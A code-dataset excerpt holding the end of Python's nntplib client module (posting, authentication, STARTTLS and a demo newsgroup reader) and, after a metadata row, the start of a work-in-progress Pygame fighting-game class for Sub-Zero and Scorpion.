if not resp.startswith('3'):
raise NNTPReplyError(resp)
if isinstance(f, (bytes, bytearray)):
f = f.splitlines()
# We don't use _putline() because:
# - we don't want additional CRLF if the file or iterable is already
# in the right format
# - we don't want a spurious flush() after each line is written
for line in f:
if not line.endswith(_CRLF):
line = line.rstrip(b"\r\n") + _CRLF
if line.startswith(b'.'):
line = b'.' + line
self.file.write(line)
self.file.write(b".\r\n")
self.file.flush()
return self._getresp()
def post(self, data):
"""Process a POST command. Arguments:
- data: bytes object, iterable or file containing the article
Returns:
- resp: server response if successful"""
return self._post('POST', data)
def ihave(self, message_id, data):
"""Process an IHAVE command. Arguments:
- message_id: message-id of the article
- data: file containing the article
Returns:
- resp: server response if successful
Note that if the server refuses the article an exception is raised."""
return self._post('IHAVE {0}'.format(message_id), data)
def _close(self):
self.file.close()
del self.file
def quit(self):
"""Process a QUIT command and close the socket. Returns:
- resp: server response if successful"""
try:
resp = self._shortcmd('QUIT')
finally:
self._close()
return resp
def login(self, user=None, password=None, usenetrc=True):
if self.authenticated:
raise ValueError("Already logged in.")
if not user and not usenetrc:
raise ValueError(
"At least one of `user` and `usenetrc` must be specified")
# If no login/password was specified but netrc was requested,
# try to get them from ~/.netrc
# Presume that if .netrc has an entry, NNRP authentication is required.
try:
if usenetrc and not user:
import netrc
credentials = netrc.netrc()
auth = credentials.authenticators(self.host)
if auth:
user = auth[0]
password = auth[2]
except OSError:
pass
# Perform NNTP authentication if needed.
if not user:
return
resp = self._shortcmd('authinfo user ' + user)
if resp.startswith('381'):
if not password:
raise NNTPReplyError(resp)
else:
resp = self._shortcmd('authinfo pass ' + password)
if not resp.startswith('281'):
raise NNTPPermanentError(resp)
# Capabilities might have changed after login
self._caps = None
self.getcapabilities()
# Attempt to send mode reader if it was requested after login.
# Only do so if we're not in reader mode already.
if self.readermode_afterauth and 'READER' not in self._caps:
self._setreadermode()
# Capabilities might have changed after MODE READER
self._caps = None
self.getcapabilities()
def _setreadermode(self):
try:
self.welcome = self._shortcmd('mode reader')
except NNTPPermanentError:
# Error 5xx, probably 'not implemented'
pass
except NNTPTemporaryError as e:
if e.response.startswith('480'):
# Need authorization before 'mode reader'
self.readermode_afterauth = True
else:
raise
if _have_ssl:
def starttls(self, context=None):
"""Process a STARTTLS command. Arguments:
- context: SSL context to use for the encrypted connection
"""
# Per RFC 4642, STARTTLS MUST NOT be sent after authentication or if
# a TLS session already exists.
if self.tls_on:
raise ValueError("TLS is already enabled.")
if self.authenticated:
raise ValueError("TLS cannot be started after authentication.")
resp = self._shortcmd('STARTTLS')
if resp.startswith('382'):
self.file.close()
self.sock = _encrypt_on(self.sock, context, self.host)
self.file = self.sock.makefile("rwb")
self.tls_on = True
# Capabilities may change after TLS starts up, so ask for them
# again.
self._caps = None
self.getcapabilities()
else:
raise NNTPError("TLS failed to start.")
class NNTP(_NNTPBase):
def __init__(self, host, port=NNTP_PORT, user=None, password=None,
readermode=None, usenetrc=False,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
"""Initialize an instance. Arguments:
- host: hostname to connect to
- port: port to connect to (default the standard NNTP port)
- user: username to authenticate with
- password: password to use with username
- readermode: if true, send 'mode reader' command after
connecting.
- usenetrc: allow loading username and password from ~/.netrc file
if not specified explicitly
- timeout: timeout (in seconds) used for socket connections
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.port = port
self.sock = socket.create_connection((host, port), timeout)
file = self.sock.makefile("rwb")
_NNTPBase.__init__(self, file, host,
readermode, timeout)
if user or usenetrc:
self.login(user, password, usenetrc)
def _close(self):
try:
_NNTPBase._close(self)
finally:
self.sock.close()
if _have_ssl:
class NNTP_SSL(_NNTPBase):
def __init__(self, host, port=NNTP_SSL_PORT,
user=None, password=None, ssl_context=None,
readermode=None, usenetrc=False,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
"""This works identically to NNTP.__init__, except for the change
in default port and the `ssl_context` argument for SSL connections.
"""
self.sock = socket.create_connection((host, port), timeout)
self.sock = _encrypt_on(self.sock, ssl_context, host)
file = self.sock.makefile("rwb")
_NNTPBase.__init__(self, file, host,
readermode=readermode, timeout=timeout)
if user or usenetrc:
self.login(user, password, usenetrc)
def _close(self):
try:
_NNTPBase._close(self)
finally:
self.sock.close()
__all__.append("NNTP_SSL")
# Test retrieval when run as a script.
if __name__ == '__main__':
import argparse
from email.utils import parsedate
parser = argparse.ArgumentParser(description="""\
nntplib built-in demo - display the latest articles in a newsgroup""")
parser.add_argument('-g', '--group', default='gmane.comp.python.general',
help='group to fetch messages from (default: %(default)s)')
parser.add_argument('-s', '--server', default='news.gmane.org',
help='NNTP server hostname (default: %(default)s)')
parser.add_argument('-p', '--port', default=-1, type=int,
help='NNTP port number (default: %s / %s)' % (NNTP_PORT, NNTP_SSL_PORT))
parser.add_argument('-n', '--nb-articles', default=10, type=int,
help='number of articles to fetch (default: %(default)s)')
parser.add_argument('-S', '--ssl', action='store_true', default=False,
help='use NNTP over SSL')
args = parser.parse_args()
port = args.port
if not args.ssl:
if port == -1:
port = NNTP_PORT
s = NNTP(host=args.server, port=port)
else:
if port == -1:
port = NNTP_SSL_PORT
s = NNTP_SSL(host=args.server, port=port)
caps = s.getcapabilities()
if 'STARTTLS' in caps:
s.starttls()
resp, count, first, last, name = s.group(args.group)
print('Group', name, 'has', count, 'articles, range', first, 'to', last)
def cut(s, lim):
if len(s) > lim:
s = s[:lim - 4] + "..."
return s
first = str(int(last) - args.nb_articles + 1)
resp, overviews = s.xover(first, last)
for artnum, over in overviews:
author = decode_header(over['from']).split('<', 1)[0]
subject = decode_header(over['subject'])
lines = int(over[':lines'])
print("{:7} {:20} {:42} ({})".format(
artnum, cut(author, 20), cut(subject, 42), lines)
)
s.quit()
| [
"tpsatish95@gmail.com"
] | tpsatish95@gmail.com |
b58ca7421c8bed7d4672349b37925015a9d1977a | 1fe03131ad139e2415fd0c0c73697b4541e5b862 | /.history/src/_fighter_20190422143244.py | 298ac4c7dbdcfafdc0a401584a8ebb9a79481efe | [
"MIT"
] | permissive | vidalmatheus/pyKombat | d83175a7a952663e278a8247d43349f87192fde3 | 6646020c59367ba0424d73a5861e13bbc0daac1f | refs/heads/master | 2021-06-20T09:35:07.950596 | 2020-08-06T14:08:13 | 2020-08-06T14:08:13 | 172,716,161 | 1 | 1 | MIT | 2019-12-25T10:54:10 | 2019-02-26T13:24:31 | Python | UTF-8 | Python | false | false | 37,663 | py |
from pygame_functions import *
import fightScene
import engine
import menu
class Fighter:
fighterNames = ["Sub-Zero", "Scorpion"]
fightMoves = [["w", "s", "a", "d"], ["up", "down", "left", "right"]]
combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]]
danceLimit = 7
walkLimit = 9
jumpLimit = 3
crouchLimit = 3
punchLimit = [3, 11, 3, 5, 3]
kickLimit = [7, 9, 7, 6, 3]
hitLimit = [3, 3, 6, 2, 3, 14, 11, 10]
blockLimit = 3
specialLimit = [4,7]
victoryLimit = 3
fatalityLimit = 20
dizzyLimit = 7
# indexação
# moves
dance = 0
walk = 1
jump = 2
crouch = 3
# punches
Apunch = 4 # soco fraco
Bpunch = 5 # soco forte
Cpunch = 6 # soco agachado fraco
Dpunch = 7 # soco agachado forte: gancho
# kicks
Akick = 8 # chute fraco
Bkick = 9 # chute forte
Ckick = 10 # chute agachado fraco
Dkick = 11 # chute agachado forte: banda
# hits
Ahit = 12 # soco fraco
Bhit = 13 # chute fraco
Chit = 14 # soco forte
Dhit = 15 # chute agrachado fraco
Ehit = 16 # soco agachado fraco
Fhit = 17 # chute forte e soco forte agachado (gancho)
Ghit = 18 # chute agachado forte: banda
#Hhit = 19 # specialMove
#fatalityHit = 20 # fatality hit
# block
Ablock = 19
#Bblock = 13
# special move
special = 20
# fatality
fatality = 24
def __init__(self, id, scenario):
self.fighterId = id
self.name = self.fighterNames[id]
self.move = self.fightMoves[id]
self.combat = self.combatMoves[id]
# Position
self.x = 150+id*500
if scenario == 1:
self.y = 350
elif scenario == 2:
self.y = 370
elif scenario == 3:
self.y = 400
elif scenario == 4:
self.y = 370
elif scenario == 5:
self.y = 380
elif scenario == 6:
self.y = 380
elif scenario == 7:
self.y = 360
elif scenario == 8:
self.y = 395
# Loading sprites
self.spriteList = []
# moves
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/dance.png', self.danceLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/walk.png', self.walkLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/jump.png', self.jumpLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/crouch.png', self.crouchLimit))
# Punch sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Apunch.png', self.punchLimit[0]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bpunch.png', self.punchLimit[1]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Cpunch.png', self.punchLimit[2]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dpunch.png', self.punchLimit[3]))
# Kick sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Akick.png', self.kickLimit[0]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bkick.png', self.kickLimit[1]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ckick.png', self.kickLimit[2]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dkick.png', self.kickLimit[3]))
# Hit sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ahit.png', self.hitLimit[0])) # soco fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bhit.png', self.hitLimit[1])) # chute fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Chit.png', self.hitLimit[2])) # soco forte
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dhit.png', self.hitLimit[3])) # chute agrachado fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ehit.png', self.hitLimit[4])) # soco agachado fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Fhit.png', self.hitLimit[5])) # chute forte e soco forte agachado (gancho)
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ghit.png', self.hitLimit[6])) # chute agachado forte: banda
#self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Hhit.png', self.hitLimit[7])) # specialMove
# blocking sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ablock.png', self.blockLimit)) # defesa em pé
#self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bblock.png', self.blockLimit)) # defesa agachado
# special sprite ----------------------------------
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Special.png', self.specialLimit[self.fighterId])) # Especial
self.act()
def act(self):
# Combat control
combat = False
block = False
alive = False
fatality = False
dizzyCounter = 1
dizzyCounterAux = 1
fatalityCounter = 8
fatalityCounterAux = 1
# Control reflection var
reflection = False
# Dance vars
self.dancing = True
self.frame_dance = 0
self.dance_step = 1
# Walk vars
self.frame_walk = 0
self.walking = False # Variável de status
# Jump vars
self.jumpHeight = 10 # Altura do pulo
self.jumpCounter = 1 # Contador correspodente à subida e descida do pulo
self.jumping = False # Variável de status
self.frame_jumping = 0
self.jump_step = 1
self.end_jump = True
# Crouch vars
self.crouching = False # Variável de status
self.frame_crouching = 0
self.crouch_step = 1
# Punch vars
self.Apunching = False
self.frame_Apunching = 0
self.Apunch_step = 1
self.end_Apunch = True
self.Bpunching = False
self.frame_Bpunching = 0
self.Bpunch_step = 1
self.end_Bpunch = True
self.Cpunching = False
self.frame_Cpunching = 0
self.Cpunch_step = 1
self.end_Cpunch = True
self.Dpunching = False
self.frame_Dpunching = 0
self.Dpunch_step = 1
self.end_Dpunch = True
# Kick vars
self.Akicking = False
self.frame_Akicking = 0
self.Akick_step = 1
self.end_Akick = True
self.Bkicking = False
self.frame_Bkicking = 0
self.Bkick_step = 1
self.end_Bkick = True
self.Ckicking = False
self.frame_Ckicking = 0
self.Ckick_step = 1
self.end_Ckick = True
self.Dkicking = False
self.frame_Dkicking = 0
self.Dkick_step = 1
self.end_Dkick = True
# Blocking vars
self.Ablocking = False
self.frame_Ablocking = 0
self.Ablock_step = 1
self.Bblocking = False
# Special vars
self.specialMove = False
self.end_special = True
self.frame_special = 0
self.special_step = 1
# Hit vars
self.hit = False
self.downHit = False
self.hitName = ""
self.Ahitting = False
self.Bhitting = False
self.Chitting = False
self.Dhitting = False
self.Ehitting = False
self.Fhitting = False
self.Ghitting = False
self.Hhitting = False
self.frame_Ahit = 0
self.frame_Bhit = 0
self.frame_Chit = 0
self.frame_Dhit = 0
self.frame_Ehit = 0
self.frame_Fhit = 0
self.frame_Ghit = 0
self.frame_Hhit = 0
self.hit_step = 1
# Life Vars
X_inicio = 37
X_atual = X_inicio
X_fim = X_inicio + 327
self.posFighter()
def fight(self, time, nextFrame):
frame_step = 60
if not self.jumping:
# fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> jump
if keyPressed(self.move[0]) and not self.hit:
self.jumping = True
self.end_jump = False
self.curr_sprite = self.spriteList[self.jump]
# fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> right
elif keyPressed(self.move[3]) and not self.hit:
self.curr_sprite = self.spriteList[self.walk]
self.walking = self.setState()
self.setEndState()
self.x += 6
moveSprite(self.spriteList[self.walk], self.x, self.y, True)
self.setSprite(self.spriteList[self.walk])
changeSpriteImage(self.spriteList[self.walk], self.frame_walk)
if time > nextFrame:
# There are 9 frames of animation in each direction
self.frame_walk = (self.frame_walk+1) % self.walkLimit
# so the modulus 9 allows it to loop
nextFrame += frame_step
# fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> left
elif keyPressed(self.move[2]) and not self.hit:# SEGUNDA MUDANÇA and not self.jumping:
self.curr_sprite = self.spriteList[self.walk]
self.walking = self.setState()
self.setEndState()
self.x -= 6
moveSprite(self.spriteList[self.walk], self.x, self.y, True)
self.setSprite(self.spriteList[self.walk])
changeSpriteImage(self.spriteList[self.walk], self.walkLimit-1-self.frame_walk)
if time > nextFrame:
# There are 9 frames of animation in each direction
self.frame_walk = (self.frame_walk+1) % self.walkLimit
nextFrame += frame_step
# fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> crouch
elif (keyPressed(self.move[1]) and not self.hit) or self.downHit:
if self.end_Cpunch and self.end_Dpunch and self.end_Ckick and self.end_Dkick and not self.hit and not self.downHit:
self.curr_sprite = self.spriteList[self.crouch]
self.crouching = self.setState()
self.setEndState()
if time > nextFrame:
if self.end_Cpunch and self.end_Dpunch and self.end_Ckick and self.end_Dkick and not self.hit and not self.downHit:
moveSprite(self.spriteList[self.crouch], self.x, self.y, True)
self.setSprite(self.spriteList[self.crouch])
changeSpriteImage(self.spriteList[self.crouch], self.frame_crouching)
self.frame_crouching = (self.frame_crouching+self.crouch_step) % self.crouchLimit
if self.frame_crouching == self.crouchLimit - 2:
self.crouch_step = 0
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and jab
if ( (keyPressed(self.combat[0]) and self.end_Cpunch) or (not self.end_Cpunch) ) and (not self.hit) and not self.downHit:
self.curr_sprite = self.spriteList[self.Cpunch]
self.Cpunching = self.setState()
self.setEndState()
self.end_Cpunch = False
if time > nextFrame:
moveSprite(self.spriteList[self.Cpunch], self.x, self.y, True)
self.setSprite(self.spriteList[self.Cpunch])
changeSpriteImage(self.spriteList[self.Cpunch], self.frame_Cpunching)
self.frame_Cpunching = (self.frame_Cpunching+self.Cpunch_step) % (self.punchLimit[2]+1)
if (self.frame_Cpunching == self.punchLimit[2]-1):
self.Cpunch_step = -1
if (self.frame_Cpunching == self.punchLimit[2]):
self.frame_Cpunching = 0
self.Cpunch_step = 1
self.end_Cpunch = True
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and strong punch
elif ( (keyPressed(self.combat[1]) and self.end_Dpunch) or ( not self.end_Dpunch) ) and (not self.hit) and not self.downHit:
self.curr_sprite = self.spriteList[self.Dpunch]
self.Dpunching = self.setState()
self.setEndState()
self.end_Dpunch = False
if time > nextFrame:
moveSprite(self.spriteList[self.Dpunch], self.x, self.y, True)
self.setSprite(self.spriteList[self.Dpunch])
changeSpriteImage(self.spriteList[self.Dpunch], self.frame_Dpunching)
self.frame_Dpunching = (self.frame_Dpunching+self.Dpunch_step) % (self.punchLimit[3]+1)
if (self.frame_Dpunching == self.punchLimit[3]-1):
self.Dpunch_step = -1
if (self.frame_Dpunching == self.punchLimit[3]):
self.frame_Dpunching = 0
self.Dpunch_step = 1
self.end_Dpunch = True
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and kick
elif ( (keyPressed(self.combat[2]) and self.end_Ckick) or ( not self.end_Ckick) ) and (not self.hit) and not self.downHit:
self.curr_sprite = self.spriteList[self.Ckick]
self.Ckicking = self.setState()
self.end_Ckick = self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Ckick], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ckick])
changeSpriteImage(self.spriteList[self.Ckick], self.frame_Ckicking)
self.frame_Ckicking = (self.frame_Ckicking+self.Ckick_step) % (self.kickLimit[2]+1)
if (self.frame_Ckicking == self.kickLimit[2]-1):
self.Ckick_step = -1
if (self.frame_Ckicking == self.kickLimit[2]):
self.frame_Ckicking = 0
self.Ckick_step = 1
self.end_Ckick = True
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> Crouch and strong kick
elif ( (keyPressed(self.combat[3]) and self.end_Dkick) or ( not self.end_Dkick) ) and (not self.hit) and not self.downHit:
self.curr_sprite = self.spriteList[self.Dkick]
self.Dkicking = self.setState()
self.end_Dkick = self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Dkick], self.x, self.y, True)
self.setSprite(self.spriteList[self.Dkick])
changeSpriteImage(self.spriteList[self.Dkick], self.frame_Dkicking)
self.frame_Dkicking = (self.frame_Dkicking+self.Dkick_step) % self.kickLimit[3]
if (self.frame_Dkicking == 0):
self.end_Dkick = True
#--------------Hit em agachado--------------------
#Hhit = 19 # specialMove
#BblockHit = 21 hit agachado
#Ehit = 16 # chute ou soco agachado fraco
elif self.downHit and self.hitName == "Ehit":
self.curr_sprite = self.spriteList[self.Ehit]
self.Ehitting = self.setState()
self.crouching = True
moveSprite(self.spriteList[self.Ehit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ehit])
changeSpriteImage(self.spriteList[self.Ehit], self.frame_Ehit)
if time > nextFrame:
self.frame_Ehit = (self.frame_Ehit+self.hit_step) % self.hitLimit[4]
if (self.frame_Ehit == self.hitLimit[4] - 1):
self.hit_step = -1
if (self.frame_Ehit == 0):
self.hit_step = 1
self.downHit = False
elif self.downHit and self.hitName == "Bblocking":
self.curr_sprite = self.spriteList[self.Bblock]
self.Ablocking = self.setState()
if time > nextFrame:
moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ablock])
changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
self.frame_Ablocking = (self.frame_Ablocking+self.hit_step) % self.blockLimit
if self.frame_Ablocking == self.blockLimit - 1:
self.hit_step = -1
if self.frame_Ablocking == 1:
self.hit_step = 1
self.hit = False
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> jab
elif ((keyPressed(self.combat[0]) and self.end_Apunch) or ( not self.end_Apunch) ) and (not self.hit) :
print("flag!")
self.curr_sprite = self.spriteList[self.Apunch]
self.Apunching = self.setState()
self.setEndState()
self.end_Apunch = False
if time > nextFrame:
moveSprite(self.spriteList[self.Apunch], self.x, self.y, True)
self.setSprite(self.spriteList[self.Apunch])
changeSpriteImage(self.spriteList[self.Apunch], self.frame_Apunching)
self.frame_Apunching = (self.frame_Apunching+self.Apunch_step) % (self.punchLimit[0]+1)
if (self.frame_Apunching == self.punchLimit[0]-1):
self.Apunch_step = -1
if (self.frame_Apunching == self.punchLimit[0]):
self.frame_Apunching = 0
self.Apunch_step = 1
self.end_Apunch = True
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> strong punch
elif ( (keyPressed(self.combat[1]) and self.end_Bpunch) or ( not self.end_Bpunch) ) and (not self.hit) :
self.curr_sprite = self.spriteList[self.Bpunch]
self.Bpunching = self.setState()
self.end_Bpunch = self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Bpunch], self.x, self.y, True)
self.setSprite(self.spriteList[self.Bpunch])
changeSpriteImage(self.spriteList[self.Bpunch], self.frame_Bpunching)
self.frame_Bpunching = (self.frame_Bpunching+self.Bpunch_step) % self.punchLimit[1]
if (self.frame_Bpunching == 0):
self.end_Bpunch = True
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> kick
elif ( (keyPressed(self.combat[2]) and self.end_Akick) or ( not self.end_Akick) ) and (not self.hit):
self.curr_sprite = self.spriteList[self.Akick]
self.Akicking = self.setState()
self.end_Akick = self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Akick], self.x, self.y, True)
self.setSprite(self.spriteList[self.Akick])
changeSpriteImage(self.spriteList[self.Akick], self.frame_Akicking)
self.frame_Akicking = (self.frame_Akicking+self.Akick_step) % (self.kickLimit[0]+1)
if (self.frame_Akicking == self.kickLimit[0]-1):
self.Akick_step = -1
if (self.frame_Akicking == self.kickLimit[0]):
self.frame_Akicking = 0
self.Akick_step = 1
self.end_Akick = True
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> strong kick
elif ( (keyPressed(self.combat[3]) and self.end_Bkick) or ( not self.end_Bkick) ) and (not self.hit):
self.curr_sprite = self.spriteList[self.Bkick]
self.Bkicking = self.setState()
self.end_Bkick = self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Bkick], self.x, self.y, True)
self.setSprite(self.spriteList[self.Bkick])
changeSpriteImage(self.spriteList[self.Bkick], self.frame_Bkicking)
self.frame_Bkicking = (self.frame_Bkicking+self.Bkick_step) % self.kickLimit[1]
if (self.frame_Bkicking == 0):
self.end_Bkick = True
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> defesa em pé
elif keyPressed(self.combat[5]) and not self.hit:
self.curr_sprite = self.spriteList[self.Ablock]
self.Ablocking = self.setState()
self.setEndState()
if time > nextFrame:
moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ablock])
changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
self.frame_Ablocking = (self.frame_Ablocking+self.Ablock_step) % self.blockLimit
if self.frame_Ablocking == self.blockLimit - 2:
self.Ablock_step = 0
nextFrame += 1*frame_step
# combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> special move
elif ((keyPressed(self.combat[4]) and self.end_special) or ( not self.end_special) ) and (not self.hit):
print("SpecialMove")
self.curr_sprite = self.spriteList[self.special]
self.specialMove = self.setState()
self.setEndState()
self.end_special = False
if time > nextFrame:
moveSprite(self.spriteList[self.special], self.x, self.y, True)
self.setSprite(self.spriteList[self.special])
changeSpriteImage(self.spriteList[self.special], self.frame_special)
self.frame_special = (self.frame_special+self.special_step) % (self.specialLimit[self.fighterId]+1)
if (self.frame_special == self.specialLimit[self.fighterId]-1):
self.special_step = -1
if (self.frame_special == self.specialLimit[self.fighterId]):
self.frame_special = 0
self.special_step = 1
self.end_special = True
nextFrame += 1*frame_step
# just dance :)
elif not self.hit:
# reset block (hold type)
self.frame_Ablocking = 0
self.Ablock_step = 1
# reset down (hold type)
self.frame_crouching = 0
self.crouch_step = 1
# reset other movement
self.frame_walk = self.frame_jumping = 0
# reset combat frames
self.frame_Apunching = self.frame_Bpunching = self.frame_Cpunching = self.frame_Dpunching = self.frame_Akicking = self.frame_Bkicking = self.frame_Ckicking = self.frame_Dkicking = 0
self.setEndState()
# start to dance
self.curr_sprite = self.spriteList[self.dance]
self.dancing = self.setState()
if time > nextFrame:
moveSprite(self.spriteList[self.dance], self.x, self.y, True)
self.setSprite(self.spriteList[self.dance])
changeSpriteImage(self.spriteList[self.dance], self.frame_dance)
self.frame_dance = (self.frame_dance+self.dance_step) % self.danceLimit
if (self.frame_dance == self.danceLimit-1):
self.dance_step = -1
if (self.frame_dance == 0):
self.dance_step = 1
nextFrame += frame_step
#--------------Hit em pé--------------------
#Hhit = 19 # specialMove
#BblockHit = 21 hit agachado
# Ouch! Punch on a face (Ahit = 12 # soco fraco)
elif self.hit and self.hitName == "Apunching":
self.curr_sprite = self.spriteList[self.Ahit]
self.Ahitting = self.setState()
moveSprite(self.spriteList[self.Ahit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ahit])
changeSpriteImage(self.spriteList[self.Ahit], self.frame_Ahit)
if time > nextFrame:
self.frame_Ahit = (self.frame_Ahit+self.hit_step) % self.hitLimit[0]
if (self.frame_Ahit == self.hitLimit[0] - 1):
self.hit_step = -1
if (self.frame_Ahit == 0):
self.hit_step = 1
self.hit = False
nextFrame += 1.2*frame_step
# Ouch! kick on a face (Bhit = 13 # chute fraco)
elif self.hit and self.hitName == "Akicking":
self.curr_sprite = self.spriteList[self.Bhit]
self.Bhitting = self.setState()
if self.fighterId == 0:
self.x -=0.8
else: self.x +=0.8
moveSprite(self.spriteList[self.Bhit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Bhit])
changeSpriteImage(self.spriteList[self.Bhit], self.frame_Bhit)
if time > nextFrame:
# There are 8 frames of animation in each direction
self.frame_Bhit = (self.frame_Bhit+self.hit_step) % self.hitLimit[1]
if (self.frame_Bhit == self.hitLimit[1] - 1):
self.hit_step = -1
if (self.frame_Bhit == 0):
self.hit_step = 1
self.hit = False
nextFrame += 1.2*frame_step
# Ouch! combo punch (Chit = 14 # soco forte)
elif self.hit and self.hitName == "Bpunching":
self.curr_sprite = self.spriteList[self.Chit]
self.Chitting = self.setState()
if self.fighterId == 0:
self.x -=2
else: self.x +=2
moveSprite(self.spriteList[self.Chit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Chit])
changeSpriteImage(self.spriteList[self.Chit], self.frame_Chit)
if time > nextFrame:
self.frame_Chit = (self.frame_Chit+self.hit_step) % self.hitLimit[2]
if (self.frame_Chit == self.hitLimit[2] - 1):
self.hit_step = -1
if (self.frame_Chit == 0):
self.hit_step = 1
self.hit = False
nextFrame += 1.2*frame_step
#Dhit = 15 # soco agrachado fraco
elif self.hit and self.hitName == "Cpunching":
self.curr_sprite = self.spriteList[self.Dhit]
self.Dhitting = self.setState()
moveSprite(self.spriteList[self.Dhit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Dhit])
changeSpriteImage(self.spriteList[self.Dhit], self.frame_Dhit)
if time > nextFrame:
self.frame_Dhit = (self.frame_Dhit+self.hit_step) % self.hitLimit[3]
if (self.frame_Dhit == self.hitLimit[3] - 1):
self.hit_step = -1
if (self.frame_Dhit == 0):
self.hit_step = 1
self.hit = False
nextFrame += 1.2*frame_step
#Fhit = 17 # chute forte e soco forte agachado (gancho)
elif self.hit and self.hitName == "Bkicking":
self.curr_sprite = self.spriteList[self.Fhit]
self.Fhitting = self.setState()
if self.frame_Fhit <= 6:
if self.fighterId == 0:
self.x -=5
else: self.x +=5
moveSprite(self.spriteList[self.Fhit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Fhit])
changeSpriteImage(self.spriteList[self.Fhit], self.frame_Fhit)
if time > nextFrame:
self.frame_Fhit = (self.frame_Fhit+self.hit_step) % self.hitLimit[5]
if (self.frame_Fhit == self.hitLimit[5] - 1):
self.hit = False
nextFrame += 1.2*frame_step
#Ghit = 18 # chute agachado forte: banda
elif self.hit and self.hitName == "Dkicking":
self.curr_sprite = self.spriteList[self.Ghit]
self.Ghitting = self.setState()
moveSprite(self.spriteList[self.Ghit], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ghit])
changeSpriteImage(self.spriteList[self.Ghit], self.frame_Ghit)
if time > nextFrame:
self.frame_Ghit = (self.frame_Ghit+self.hit_step) % self.hitLimit[6]
if (self.frame_Ghit == self.hitLimit[6] - 1):
self.hit = False
nextFrame += 1.2*frame_step
#blockHit! Defesa em pé.
elif self.hit and self.hitName == "Ablocking":
self.curr_sprite = self.spriteList[self.Ablock]
self.Ablocking = self.setState()
if time > nextFrame:
moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
self.setSprite(self.spriteList[self.Ablock])
changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
self.frame_Ablocking = (self.frame_Ablocking+self.hit_step) % self.blockLimit
if self.frame_Ablocking == self.blockLimit - 1:
self.hit_step = -1
if self.frame_Ablocking == 1:
self.hit_step = 1
self.hit = False
nextFrame += 1*frame_step
else:
# fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> jump
if time > nextFrame:
if keyPressed(self.move[2]):
self.x -= 15
if keyPressed(self.move[3]):
self.x += 15
moveSprite(self.spriteList[self.jump], self.x, self.y, True)
self.setSprite(self.spriteList[self.jump])
self.y -= (self.jumpHeight-self.jumpCounter)*7
changeSpriteImage(self.spriteList[self.jump], self.frame_jumping)
